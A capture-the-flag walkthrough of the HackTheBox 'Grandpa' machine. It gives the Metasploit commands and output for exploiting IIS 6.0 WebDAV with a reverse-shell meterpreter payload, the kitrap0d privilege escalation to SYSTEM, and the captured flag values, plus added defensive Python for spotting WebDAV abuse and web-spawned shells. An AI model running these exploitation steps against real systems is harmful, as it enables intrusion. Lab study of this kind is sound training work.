A quick walkthrough of the VM named "Grandpa" on HackTheBox.
A quick nmap scan:
http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
So we have IIS 6.0 with WebDAV enabled. Let's ask searchsploit:
$ searchsploit iis webdav
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Run it through Google:
https://www.exploit-db.com/exploits/41738
https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-63/version_id-13444/Microsoft-Internet-Information-Server-6.0.html
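Before jumping to exploitation, here is the check a defender would run on the same nmap output: which of the advertised WebDAV methods can change content on the server, and what a WAF/IDS in front of the host should flag in a request (WebDAV methods, and header values far larger than any legitimate client sends). This is an added example, not code from the walkthrough; the sample requests and the 1024-byte threshold are constructed assumptions.

```python
"""Defensive checks for the IIS 6 WebDAV exposure found above. Added example, not
code from the walkthrough; samples and the header threshold are constructed."""

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}
MAX_HEADER_VALUE = 1024  # assumption: legitimate WebDAV header values are far shorter

# Constructed from the nmap http-webdav-scan output of this host.
NMAP_OUTPUT = """\
| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH"""


def exposed_write_methods(nmap_output: str) -> list:
    """Return the advertised methods that can create, change or delete content."""
    for line in nmap_output.splitlines():
        line = line.lstrip("|_ ")
        if line.startswith("Public Options:"):
            methods = {m.strip() for m in line.split(":", 1)[1].split(",")}
            return sorted(methods & WRITE_METHODS)
    return []


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, target, {lowercased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower().decode("latin-1")] = value.strip()
    return method.decode("latin-1"), target.decode("latin-1"), headers


def inspect_request(raw: bytes) -> list:
    """Findings a WAF/IDS in front of the IIS host would raise for one request."""
    method, target, headers = parse_request(raw)
    findings = []
    if method in WEBDAV_METHODS:
        findings.append(f"webdav-method {method} {target}")
    for name, value in headers.items():
        if len(value) > MAX_HEADER_VALUE:
            findings.append(f"oversized-header {name} ({len(value)} bytes)")
    return findings


# Constructed samples: a normal directory listing and one with a bloated If header.
BENIGN = b"PROPFIND /docs/ HTTP/1.1\r\nHost: 10.129.139.10\r\nDepth: 1\r\n\r\n"
SUSPECT = b"PROPFIND / HTTP/1.1\r\nHost: 10.129.139.10\r\nIf: " + b"A" * 2000 + b"\r\n\r\n"
```

The fix on the server side is the same either way: disable WebDAV on IIS 6 (or retire the host), and drop PUT/DELETE/MKCOL/MOVE/COPY/PROPPATCH from what the server answers to.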
And finally, let's ask Metasploit: fire up msfconsole and run a search for iis webdav.
msf6 > search webdav iis
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
1 exploit/windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow
2 auxiliary/scanner/http/dir_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
3 auxiliary/scanner/http/ms09_020_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Authentication Bypass
4 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution
5 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
msf6 >
So we have it in a lot of places; for no reason other than laziness, let's go with MSF.
msf > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf > show options
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.13 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Here we have a meterpreter reverse_tcp payload and the WebDAV exploit configured, so set LHOST and RHOSTS, run it, and you should get a meterpreter reverse shell back. Now we need to elevate to something useful using a local exploit, so local_exploit_suggester to the rescue.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.139.10 - Collecting local exploits for x86/windows...
[*] 10.129.139.10 - 37 exploit checks are being tried...
[+] 10.129.139.10 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.139.10 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.139.10 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.139.10 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.139.10 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.139.10 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
Now, if you try these, you will see they fail, because we haven't got the rights to run them. So how do we fix that? We need to migrate into a process that has the rights we need and run them again. So let's try that: head back to the meterpreter session and get to work.
meterpreter > sysinfo
Computer : GRANPA
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
268 4 smss.exe
324 268 csrss.exe
348 268 winlogon.exe
396 348 services.exe
408 348 lsass.exe
596 396 svchost.exe
680 396 svchost.exe
740 396 svchost.exe
776 396 svchost.exe
808 396 svchost.exe
1000 396 spoolsv.exe
1028 396 msdtc.exe
1104 396 cisvc.exe
1148 396 svchost.exe
1208 396 inetinfo.exe
1256 396 svchost.exe
1348 396 VGAuthService.exe
1412 396 vmtoolsd.exe
1484 396 svchost.exe
1672 396 svchost.exe
1808 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1856 396 dllhost.exe
1932 396 alg.exe
2268 348 logon.scr
2436 596 wmiprvse.exe
2596 2752 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
2752 1484 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2824 596 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3200 2596 cmd.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\cmd.exe
3984 1104 cidaemon.exe
4028 1104 cidaemon.exe
4052 1104 cidaemon.exe
meterpreter > migrate 408
[*] Migrating from 2596 to 408...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
meterpreter > migrate 1808
[*] Migrating from 2596 to 1808...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter >
So, we listed the running processes, found lsass.exe, and tried to migrate into that, but that clearly didn't work. But there's another one, PID 1808, running as NT AUTHORITY\NETWORK SERVICE.
We tried that, and this time it worked. So, what now? Background the session, run kitrap0d, and see if we get SYSTEM.
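The ps listing above is also exactly what a defender looks at: the IIS worker w3wp.exe has spawned rundll32.exe, which spawned cmd.exe, and a web server has no business doing either. The Python below, an added example and not code from the walkthrough, rebuilds the parent-child chain from such a listing and flags shells or LOLBins that have a web worker anywhere in their ancestry. The sample list is constructed from the listing above; the name sets are assumptions to be tuned per environment.

```python
"""Triage a Windows process list for shells or LOLBins descended from the IIS
worker, as a detection a defender would run over the ps output above.
Added example, not code from the walkthrough; the sample list is constructed."""

WEB_WORKERS = {"w3wp.exe", "inetinfo.exe"}
SHELL_OR_LOLBIN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
                   "mshta.exe", "certutil.exe"}

# Constructed subset of the meterpreter ps listing from this box (PID PPID Name ...).
SAMPLE_PS = r"""
4 0 System
268 4 smss.exe
348 268 winlogon.exe
396 348 services.exe
596 396 svchost.exe
1484 396 svchost.exe
1808 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2752 1484 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2596 2752 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
3200 2596 cmd.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\cmd.exe
"""


def parse_ps(text: str) -> dict:
    """Map pid -> (ppid, lowercased name); extra columns such as user/path are ignored."""
    procs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].isdigit() and parts[1].isdigit():
            procs[int(parts[0])] = (int(parts[1]), parts[2].lower())
    return procs

def ancestry(procs: dict, pid: int) -> list:
    """Process names from pid up to the root; the seen-set guards against cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid, name = procs[pid]
        chain.append(name)
        pid = ppid
    return chain

def flag_web_spawned_shells(text: str) -> list:
    """Return (pid, chain) for shells/LOLBins with an IIS worker in their ancestry."""
    procs = parse_ps(text)
    hits = []
    for pid in sorted(procs):
        chain = ancestry(procs, pid)
        if chain[0] in SHELL_OR_LOLBIN and WEB_WORKERS & set(chain[1:]):
            hits.append((pid, " <- ".join(chain)))
    return hits
```

The same parent-child rule, fed by Sysmon or EDR process-creation events instead of a one-off ps dump, is what would have caught the initial shell on this box before any privilege escalation happened.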
msf6 exploit(windows/local/ms16_016_webdav) > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.25 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Launching notepad to host the exploit...
[+] Process 2516 launched.
[*] Reflectively injecting the exploit DLL into 2516...
[*] Injecting exploit into 2516 ...
[*] Exploit injected. Injecting payload into 2516...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.129.139.10
[*] Meterpreter session 2 opened (10.10.14.25:4444 -> 10.129.139.10:1033) at 2021-04-30 14:23:32 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
shell
And it did: we got SYSTEM. Let's grab the flags.
meterpreter > cat 'c:\Documents and Settings\Harry\Desktop\user.txt'
bdff5ec67c3cff017f2bedc146a5d869
meterpreter > cat 'c:\Documents and Settings\Administrator\Desktop\root.txt'
9359e905a2c35f861f6a57cecf28bb7b
Okay, time for coffee and a snack, we got this ;)